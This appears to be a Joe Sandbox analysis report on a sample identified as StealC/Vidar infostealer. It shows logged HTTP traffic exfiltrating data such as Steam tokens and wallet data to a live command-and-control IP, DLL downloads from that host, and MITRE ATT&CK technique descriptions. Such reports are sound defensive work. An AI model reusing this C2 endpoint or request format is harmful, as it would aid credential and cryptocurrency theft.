Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIIJJKKFHIEHJKECGCGCHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 49 49 4a 4a 4b 4b 46 48 49 45 48 4a 4b 45 43 47 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 31 63 35 35 30 63 37 65 37 31 61 33 30 61 33 34 30 61 62 61 39 65 39 62 64 66 35 62 61 37 61 30 61 63 32 61 61 30 30 38 62 39 33 30 34 37 31 33 34 34 37 33 63 37 65 66 64 37 37 33 36 66 36 33 63 38 66 66 35 31 62 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 4a 4a 4b 4b 46 48 49 45 48 4a 4b 45 43 47 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 4a 4a 4b 4b 46 48 49 45 48 4a 4b 45 43 47 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 4a 4a 4b 4b 46 48 49 45 48 4a 4b 45 43 47 43 47 43 2d 2d 0d 0a Data Ascii: ------FIIJJKKFHIEHJKECGCGCContent-Disposition: form-data; name="token"51c550c7e71a30a340aba9e9bdf5ba7a0ac2aa008b93047134473c7efd7736f63c8ff51b------FIIJJKKFHIEHJKECGCGCContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------FIIJJKKFHIEHJKECGCGCContent-Disposition: form-data; name="file"------FIIJJKKFHIEHJKECGCGC--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJJEBGDAFHJEBGDGIJDHHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4a 45 42 47 44 41 46 48 4a 45 42 47 44 47 49 4a 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 31 63 35 35 30 63 37 65 37 31 61 33 30 61 33 34 30 61 62 61 39 65 39 62 64 66 35 62 61 37 61 30 61 63 32 61 61 30 30 38 62 39 33 30 34 37 31 33 34 34 37 33 63 37 65 66 64 37 37 33 36 66 36 33 63 38 66 66 35 31 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 45 42 47 44 41 46 48 4a 45 42 47 44 47 49 4a 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 45 42 47 44 41 46 48 4a 45 42 47 44 47 49 4a 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 45 42 47 44 41 46 48 4a 45 42 47 44 47 49 4a 44 48 2d 2d 0d 0a Data Ascii: ------JJJEBGDAFHJEBGDGIJDHContent-Disposition: form-data; name="token"51c550c7e71a30a340aba9e9bdf5ba7a0ac2aa008b93047134473c7efd7736f63c8ff51b------JJJEBGDAFHJEBGDGIJDHContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------JJJEBGDAFHJEBGDGIJDHContent-Disposition: form-data; name="file"------JJJEBGDAFHJEBGDGIJDH--
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/freebl3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/mozglue.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/msvcp140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/nss3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/softokn3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/vcruntime140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGIDBFBFHJDGCAKEGHJEHost: 185.215.113.37Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGCBGCAFIIECBFIDHIJKHost: 185.215.113.37Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 31 63 35 35 30 63 37 65 37 31 61 33 30 61 33 34 30 61 62 61 39 65 39 62 64 66 35 62 61 37 61 30 61 63 32 61 61 30 30 38 62 39 33 30 34 37 31 33 34 34 37 33 63 37 65 66 64 37 37 33 36 66 36 33 63 38 66 66 35 31 62 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 2d 2d 0d 0a Data Ascii: ------BGCBGCAFIIECBFIDHIJKContent-Disposition: form-data; name="token"51c550c7e71a30a340aba9e9bdf5ba7a0ac2aa008b93047134473c7efd7736f63c8ff51b------BGCBGCAFIIECBFIDHIJKContent-Disposition: form-data; name="message"wallets------BGCBGCAFIIECBFIDHIJK--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGHCGCAEBFIJKFIDBGHDHost: 185.215.113.37Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 48 43 47 43 41 45 42 46 49 4a 4b 46 49 44 42 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 31 63 35 35 30 63 37 65 37 31 61 33 30 61 33 34 30 61 62 61 39 65 39 62 64 66 35 62 61 37 61 30 61 63 32 61 61 30 30 38 62 39 33 30 34 37 31 33 34 34 37 33 63 37 65 66 64 37 37 33 36 66 36 33 63 38 66 66 35 31 62 0d 0a 2d 2d 2d 2d 2d 2d 42 47 48 43 47 43 41 45 42 46 49 4a 4b 46 49 44 42 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 42 47 48 43 47 43 41 45 42 46 49 4a 4b 46 49 44 42 47 48 44 2d 2d 0d 0a Data Ascii: ------BGHCGCAEBFIJKFIDBGHDContent-Disposition: form-data; name="token"51c550c7e71a30a340aba9e9bdf5ba7a0ac2aa008b93047134473c7efd7736f63c8ff51b------BGHCGCAEBFIJKFIDBGHDContent-Disposition: form-data; name="message"files------BGHCGCAEBFIJKFIDBGHD--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFBAFBKEGCFBGCBFIDAKHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 42 41 46 42 4b 45 47 43 46 42 47 43 42 46 49 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 31 63 35 35 30 63 37 65 37 31 61 33 30 61 33 34 30 61 62 61 39 65 39 62 64 66 35 62 61 37 61 30 61 63 32 61 61 30 30 38 62 39 33 30 34 37 31 33 34 34 37 33 63 37 65 66 64 37 37 33 36 66 36 33 63 38 66 66 35 31 62 0d 0a 2d 2d 2d 2d 2d 2d 41 46 42 41 46 42 4b 45 47 43 46 42 47 43 42 46 49 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 46 42 41 46 42 4b 45 47 43 46 42 47 43 42 46 49 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 41 46 42 41 46 42 4b 45 47 43 46 42 47 43 42 46 49 44 41 4b 2d 2d 0d 0a Data Ascii: ------AFBAFBKEGCFBGCBFIDAKContent-Disposition: form-data; name="token"51c550c7e71a30a340aba9e9bdf5ba7a0ac2aa008b93047134473c7efd7736f63c8ff51b------AFBAFBKEGCFBGCBFIDAKContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------AFBAFBKEGCFBGCBFIDAKContent-Disposition: form-data; name="file"------AFBAFBKEGCFBGCBFIDAK--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFIECBFIDGDAKFHIEHJKHost: 185.215.113.37Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 49 45 43 42 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 31 63 35 35 30 63 37 65 37 31 61 33 30 61 33 34 30 61 62 61 39 65 39 62 64 66 35 62 61 37 61 30 61 63 32 61 61 30 30 38 62 39 33 30 34 37 31 33 34 34 37 33 63 37 65 66 64 37 37 33 36 66 36 33 63 38 66 66 35 31 62 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 45 43 42 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 45 43 42 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 2d 2d 0d 0a Data Ascii: ------CFIECBFIDGDAKFHIEHJKContent-Disposition: form-data; name="token"51c550c7e71a30a340aba9e9bdf5ba7a0ac2aa008b93047134473c7efd7736f63c8ff51b------CFIECBFIDGDAKFHIEHJKContent-Disposition: form-data; name="message"ybncbhylepme------CFIECBFIDGDAKFHIEHJK--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGHJECAFIDAFHJKFCGHIHost: 185.215.113.37Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 43 41 46 49 44 41 46 48 4a 4b 46 43 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 31 63 35 35 30 63 37 65 37 31 61 33 30 61 33 34 30 61 62 61 39 65 39 62 64 66 35 62 61 37 61 30 61 63 32 61 61 30 30 38 62 39 33 30 34 37 31 33 34 34 37 33 63 37 65 66 64 37 37 33 36 66 36 33 63 38 66 66 35 31 62 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 43 41 46 49 44 41 46 48 4a 4b 46 43 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 43 41 46 49 44 41 46 48 4a 4b 46 43 47 48 49 2d 2d 0d 0a Data Ascii: ------DGHJECAFIDAFHJKFCGHIContent-Disposition: form-data; name="token"51c550c7e71a30a340aba9e9bdf5ba7a0ac2aa008b93047134473c7efd7736f63c8ff51b------DGHJECAFIDAFHJKFCGHIContent-Disposition: form-data; name="message"wkkjqaiaxkhb------DGHJECAFIDAFHJKFCGHI--

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: Vidar

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\BKJJJDHD

C:\ProgramData\CFIECBFIDGDAKFHIEHJK

C:\ProgramData\DAKJDAAF

C:\ProgramData\EHIIIJDAAAAAAKECBFBAEBKJJJ

C:\ProgramData\FHIDAFHCBAKFCAAKFCFCFIIJKF

C:\ProgramData\GCFHDAKECFIDGDGDBKJD

C:\ProgramData\JJJEBGDAFHJEBGDGIJDH

C:\ProgramData\KJEHCGDBFCBAKECBKKEBKEBFCA

C:\ProgramData\freebl3.dll

C:\ProgramData\mozglue.dll

C:\ProgramData\msvcp140.dll

C:\ProgramData\nss3.dll

Windows Analysis Report
file.exe

Function 008A9860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212
libraryloaderCOMMON

Function 008945C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148
memoryCOMMON

Function 0089BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675
fileCOMMON

Function 008A4910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172
fileCOMMON

Function 00894880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479
networkstringfileCOMMON

Function 008A9C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684
libraryloaderCOMMON

Function 00897710 Relevance: 81.6, APIs: 54, Instructions: 584
stringmemoryCOMMON

Function 008A0250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366
